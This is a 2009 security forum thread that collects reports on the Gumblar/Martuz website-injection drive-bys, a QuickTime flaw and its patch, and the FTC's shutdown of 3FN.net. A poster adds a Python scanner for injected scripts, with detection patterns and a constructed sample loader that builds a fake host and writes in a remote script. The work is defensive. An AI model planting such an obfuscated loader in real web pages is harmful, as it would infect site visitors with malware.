Last Updated: 2009-05-18 17:54:18 UTC - "... Gumblar/JSRedir-R drive-bys. Although this malware has been around for a while, several A/V vendors and some relatively mainstream news outlets have recently reported a large increase in websites injected with JSRedir-R/Gumblar. According to Sophos* this malware accounted for approximately 42% of all infected websites detected in the last week, nearly 6 times its closest rival. Although the infection method is not clear, given the variety of servers and platforms, it is most likely weak login credentials..."
* http://www.sophos.com/blogs/gc/g/2009/05/14/malicious-jsredir-javascript-biggest-malware-threat-web
May 14, 2009

> http://forums.spybot.info/showpost.php?p=312220&postcount=82
 
Gumblar whac-a-Mole game continues...

FYI...

- http://preview.tinyurl.com/qlr9ba
05-19-2009 Symantec Security Response Blog - "The malicious code Whac-a-Mole game continues. Just as security vendors start detecting the domains and malware associated with the drive-by download attacks coming from the malicious Gumblar domains, the bad guys are changing the game and popping up from Martuz dot cn, which, according to Who.is, is located in the UK with a 95.129.x.x IP Address. The JavaScript appearing on the websites has also become more obfuscated, making the attacks slightly harder for IT managers and Web administrators to detect. The attackers are easily able to change the obfuscation by substituting portions of the domain name with variables instead of spelling out the domain all at once. The updated malicious JavaScript also performs a test to deliver a different payload for users of Google Chrome browsers, since Chrome has a blacklist of suspicious and malicious domains. The drive-by download tries to exploit a number of underlying vulnerabilities, including some for Adobe Acrobat and Adobe Flash. Users should make sure that their systems are running the latest versions of these and other third-party applications to help mitigate the risk of being compromised.
So how is it that so many websites are compromised at one time? Often it is due to SQL injection errors or direct hacking into the back end of the hosting companies, but it appears that this recent problem may be more about compromised FTP passwords that belonged to the people that administer the websites. In any case, it means the bad guys are able to continually change the malicious code until the admin changes the FTP passwords and blocks the trespassing... We expect the domains and malicious JavaScript appearing on the websites to continually change as one mole is whacked, and another pops up..."

- http://isc.sans.org/diary.html?storyid=6403
Last Updated: 2009-05-19 13:02:01 UTC - "... the dropbox for this trojan, gumblar .cn has been offline since last Friday, but a successor has come online, martuz .cn..."

- http://blog.scansafe.com/journal/2009/5/19/gumblar-up-another-7-martuzcn-is-down.html
May 19, 2009
- http://blog.scansafe.com/journal/2009/5/18/japans-geno-gumblar.html
- http://blog.scansafe.com/journal/2009/5/18/gumblar-a-botnet-of-compromised-websites.html

- http://www.us-cert.gov/current/index.html#gumblar_malware_attack_circulating
May 18, 2009

:fear::fear:
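Because the injected script is unique per site and the domain changes as each one is taken down, a web admin cannot grep for a known string. The block below is an added example (Python, not from Symantec, ScanSafe or the ISC) of scanning a web root for the traits the posts above describe: a script block that decodes or builds its own markup (unescape, fromCharCode, eval, document.write), sniffs the browser (the Chrome check), and assembles a host name from short string fragments. A block is reported only when at least two traits are present, to keep ordinary pages quiet. The sample pages are constructed, the host in them is fake, and the scoring thresholds are this example's own assumptions.

```python
import math
import os
import re
from collections import Counter

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)

# Each pattern is one trait of the injected loader; see score_script().
SIGNS = [
    (r"String\.fromCharCode", "fromCharCode decoding"),
    (r"\bunescape\s*\(", "unescape() decoding"),
    (r"\beval\s*\(", "eval() of a built string"),
    (r"document\.write\s*\(", "document.write of generated markup"),
    (r"\.replace\s*\(\s*/", "regex strip used to rebuild a string"),
    (r"navigator\.userAgent", "browser sniffing"),
    (r"(?:['\"][^'\"\n]{1,4}['\"]\s*\+\s*){4,}", "host or URL assembled from short fragments"),
]


def entropy(text):
    """Shannon entropy in bits per character; obfuscated blobs run high."""
    n = len(text)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def score_script(body):
    """Return the list of reasons a script body looks like an injected loader."""
    reasons = [why for pat, why in SIGNS if re.search(pat, body)]
    longest = max((len(line) for line in body.splitlines()), default=0)
    if longest > 500:
        reasons.append(f"single line of {longest} chars")
    if entropy(body) > 5.0:
        reasons.append("high character entropy")
    return reasons


def scan_html(text, min_reasons=2):
    """Findings for every <script> block in one page that shows min_reasons or more traits."""
    findings = []
    for m in SCRIPT_RE.finditer(text):
        reasons = score_script(m.group(1))
        if len(reasons) >= min_reasons:
            findings.append({"offset": m.start(), "reasons": reasons})
    return findings


def scan_tree(root, exts=(".html", ".htm", ".php", ".tpl")):
    """Walk a copy of the web root and return {path: findings}. Run it from a
    clean machine; the admin PC that holds the FTP password is a suspect."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan_html(fh.read())
                if found:
                    hits[path] = found
    return hits


# Constructed sample pages (fake host, no exploit code).
CLEAN_PAGE = """<html><head><script src="/js/site.js"></script></head>
<body><script>document.getElementById('menu').className = 'open';</script></body></html>"""

INJECTED_PAGE = """<html><body><p>Welcome</p>
<script>var h='b'+'ad.'+'ex'+'am'+'ple';if(navigator.userAgent.indexOf('Chrome')==-1){document.write(unescape('%3Cscript%20src%3D%22http://'+h+'/in.php%22%3E%3C/script%3E'));}</script>
</body></html>"""

if __name__ == "__main__":
    print("clean:", scan_html(CLEAN_PAGE))
    print("injected:", scan_html(INJECTED_PAGE))
```

Minified libraries will trip the long-line and fromCharCode checks on their own, which is why the default needs two traits; raise `min_reasons` or exclude known library paths rather than lowering the signal set. Cleaning the pages without rotating the FTP credentials and disinfecting the machine they were stolen from just restarts the cycle the Symantec post describes.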
 
QuickTime vuln - unpatched

FYI...

- http://secunia.com/advisories/35091/
Release Date: 2009-05-22
Critical: Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched
Software: Apple QuickTime 7.x ...
... The vulnerability is caused due to an error in the processing of "0x77" tags within PICT images, which can be exploited to cause a heap-based buffer overflow when the user opens a specially crafted PICT image or visits a malicious web site...
Solution: Do not browse untrusted web sites. Do not open files from untrusted sources..."

Fix/patch released:
- http://forums.spybot.info/showpost.php?p=315588&postcount=2
2009-06-01

:sad::fear:
 
Gumblar/Martuz/Geno attack...

FYI...

- http://isc.sans.org/diary.html?storyid=6430
Last Updated: 2009-05-21 19:29:48 UTC - "... client side analysis* and writeup of recent gumblar malware attacks..."
* http://preview.tinyurl.com/pc26gr
May 21, 2009 InfoSec from the trenches - "... Once compromised by the Gumblar/Martuz/Geno, victims will have many pieces of malware loaded onto their machines, this malware does the following:
• Steals FTP credentials
• Sends SPAM
• Installs fake anti virus
• Hijacks Google search queries
• Disables security software
The exploits used are for Adobe Acrobat and Adobe Flash Player...
...this is a very large attack encompassing many malicious payloads..."

// http://forums.spybot.info/showpost.php?p=312220&postcount=82
 
QuickTime v7.6.2 released

FYI...

- http://support.apple.com/kb/HT3591
June 01, 2009 - "This document describes the security content of QuickTime 7.6.2, which can be downloaded and installed via Software Update preferences, or from Apple Downloads*..."
* http://support.apple.com/downloads/

> http://support.apple.com/kb/HT1222

- http://secunia.com/advisories/35091/2/
Last Update: 2009-06-02 <<<
Critical: Highly critical
Solution: Update to version 7.6.2...
> http://support.apple.com/downloads/QuickTime_7_6_2_for_Windows

CVE reference:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0010
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0185
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0188
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0951
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0952
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0953
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0954
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0955
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0956
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0957

Also: iTunes 8.2 released
- http://support.apple.com/kb/HT3592
June 01, 2009
> http://secunia.com/advisories/35314/2/
Release Date: 2009-06-02
Critical: Highly critical
Impact: System access
Where: From remote
Solution Status: Vendor Patch
Software: iTunes 8.x ...
Solution: Update to version 8.2...
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0950

:fear:
 
FTC shuts down 3FN.net

FYI...

- http://www.theregister.co.uk/2009/06/04/3fn_shut_down/
4 June 2009 - "Federal authorities have shut down what they said was the worst US-based web hosting provider after convincing a judge it actively participated in the distribution of child pornography, spam, malware, and other net-based menaces. The US Federal Trade Commission obtained the court order against 3FN.net, a service provider with servers mostly located in San Jose, California that also operated under the name Pricewert. Dated June 2, it commanded all companies providing upstream services to 3FN to immediately pull the plug. The order was issued in secret to prevent the operators from being able to destroy evidence or find new hosts, something FTC attorneys said was necessary given the extreme nature of the data it hosted. "This content includes a witches' brew of child pornography, botnet command and control servers, spyware, viruses, trojans, phishing-related sites, and pornography featuring violence, bestiality, and incest," they wrote in court documents. "In addition to recruiting and willingly distributing this illegal, malicious and harmful content, Pricewert actively colludes with its criminal clientele in several areas, including the maintenance and deployment of networks of compromised computers known as botnets." This week's action is the most significant shutdown since the shuttering in November of McColo, another Northern California-based service provider with ties to online crime... One of the biggest complaints among white hat hackers is the difficulty of shutting down networks that flagrantly violate the law. This week's action is the first time the FTC has used its congressional mandate to protect US consumers to sever a service provider suspected of illegal activity... Court documents are available here*."
* http://www.ftc.gov/os/caselist/0923148/index.shtm

- http://news.cnet.com/8301-1009_3-10257588-83.html
June 4, 2009 - "... In its filings with the district court, the FTC estimates that more than 4,500 malicious software programs are controlled by command-and-control servers hosted by 3FN. This malware includes programs capable of keystroke logging, password and data stealing, programs with hidden backdoor remote control activity, and programs involved in spam distribution. This case was brought to light with the assistance of multiple agencies and people including NASA's Office of Inspector General; the Department of Justice's Computer Crime Division; Gary Warner, director of research in computer forensics at the University of Alabama at Birmingham; the National Center for Missing and Exploited Children; the Shadowserver Foundation; the Spamhaus Project; and Symantec..."

- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=217701956
June 4, 2009 - "... The only entity named in the case is Pricewert. Ethan Arenson, an attorney with the FTC's Bureau of Consumer Protection, said that the individuals behind the company are overseas in Eastern Europe. He declined to comment on a possible extradition effort or coordination with authorities abroad. Whether the individuals doing business as Pricewert will face charges remains an open question. Pricewert is essentially an Oregon shell corporation with some servers in San Jose..."

- http://voices.washingtonpost.com/securityfix/pushdo.htm

- http://asert.arbornetworks.com/2009/06/things-in-3fn/

:bigthumb:
 